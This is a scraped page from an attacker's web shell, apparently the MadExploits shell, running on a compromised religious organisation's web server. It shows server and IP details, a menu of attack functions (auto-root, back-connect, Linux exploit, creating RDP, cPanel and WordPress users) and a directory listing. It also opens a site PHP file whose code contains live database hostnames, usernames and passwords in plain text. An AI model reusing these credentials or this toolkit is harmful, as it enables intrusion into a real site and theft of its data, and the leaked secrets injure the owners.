Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
apps /
[ HOME SHELL ]
Name
Size
Permission
Action
aryaSamajImages
[ DIR ]
drwxr-xr-x
bhajans
[ DIR ]
drwxr-xr-x
login
[ DIR ]
drwxr-xr-x
.ftpquota
11
B
-rw-r--r--
aryasamajws.php
3.1
KB
-rw-r--r--
aryasamajwslike.php
1.67
KB
-rw-r--r--
error_log
4.39
MB
-rw-r--r--
mservices.php
512
B
-rw-r--r--
new_sendmessage.php
2.46
KB
-rw-r--r--
new_sendmessage2.php
2.29
KB
-rw-r--r--
portscan.php
272
B
-rw-r--r--
sendmessage.php
2.89
KB
-rw-r--r--
sendmessage_aryasamaj.php
2.87
KB
-rw-r--r--
simplepush.php
1.52
KB
-rw-r--r--
storeregid1.php
729
B
-rw-r--r--
storetoken.php
870
B
-rw-r--r--
storetoken_aryasamaj.php
918
B
-rw-r--r--
tbl_info.php
511
B
-rw-r--r--
tbl_services.php
515
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aryasamajws.php
<?php //mysql_connect("103.20.213.56","thearyas_asmaps1","arya@samaj@app") or die("not able to connect"); mysql_connect("localhost","thearyasamaj","Pr67383ZXGZ4Ass") or die("not able to connect"); //mysql_select_db("thearyas_asmapp") or die("db not accessible"); mysql_select_db("thearyas_portal") or die("db not accessible"); function getsize($url){ $chGetSize = curl_init(); // Set the url we're requesting curl_setopt($chGetSize, CURLOPT_URL, $url); // Set a valid user agent curl_setopt($chGetSize, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"); // Don't output any response directly to the browser curl_setopt($chGetSize, CURLOPT_RETURNTRANSFER, true); // Don't return the header (we'll use curl_getinfo(); curl_setopt($chGetSize, CURLOPT_HEADER, false); // Don't download the body content curl_setopt($chGetSize, CURLOPT_NOBODY, true); // Run the curl functions to process the request $chGetSizeStore = curl_exec($chGetSize); $chGetSizeError = curl_error($chGetSize); $chGetSizeInfo = curl_getinfo($chGetSize); // Close the connection curl_close($chGetSize);// Print the file size in bytes return $chGetSizeInfo['download_content_length']; } if(isset($_REQUEST['cat']) && $_REQUEST['cat']=="mp3"){ $mp3qry="select mp3.id , C.Category AS category , mp3.mp3title , mp3.mp3url FROM mp3table AS mp3 LEFT JOIN tbl_Categories AS C ON mp3.category = C.ID"; $mp3res=mysql_query($mp3qry) or die(mysql_error()); $mp3numrows=mysql_num_rows($mp3res); $i=0; // echo "["; $json = array(); while($mp3row=mysql_fetch_array($mp3res)){ $filesize=getsize($mp3row['mp3url']); $json[] = array( "mp3id" => $mp3row['id'], "mp3category" => $mp3row['category'], "mp3title" => $mp3row['mp3title'], "mp3url" => $mp3row['mp3url'], "filesize" => $filesize, ); /* echo "{\"mp3id\":\"".$mp3row[0]."\",\"mp3category\":\"".$mp3row[1]."\",\"mp3title\":\"".$mp3row[2]."\",\"mp3url\":\"".$mp3row[3]."\",\"filesize\":\"".$filesize."\"}"; if($i<($mp3numrows-1)) echo ","; $i++;*/ } echo json_encode($json); // echo "]"; } elseif(isset($_REQUEST['cat']) && $_REQUEST['cat']=="img"){ $imgqry="select * from imagetable"; $imgres=mysql_query($imgqry) or die(mysql_error()); $imgnumrows=mysql_num_rows($imgres); $i=0; echo "["; while($imgrow=mysql_fetch_row($imgres)){ $filesize=getsize($imgrow[3]); echo "{\"imageid\":\"".$imgrow[0]."\",\"imagecategory\":\"".$imgrow[1]."\",\"imagetitle\":\"".$imgrow[2]."\",\"imageurl\":\"".$imgrow[3]."\",\"filesize\":\"".$filesize."\"}"; if($i<($imgnumrows-1)) echo ","; $i++; } echo "]"; }else{ echo "[{\"Result\":\"Category not selected or it does not exist\"}]"; } ?>
Close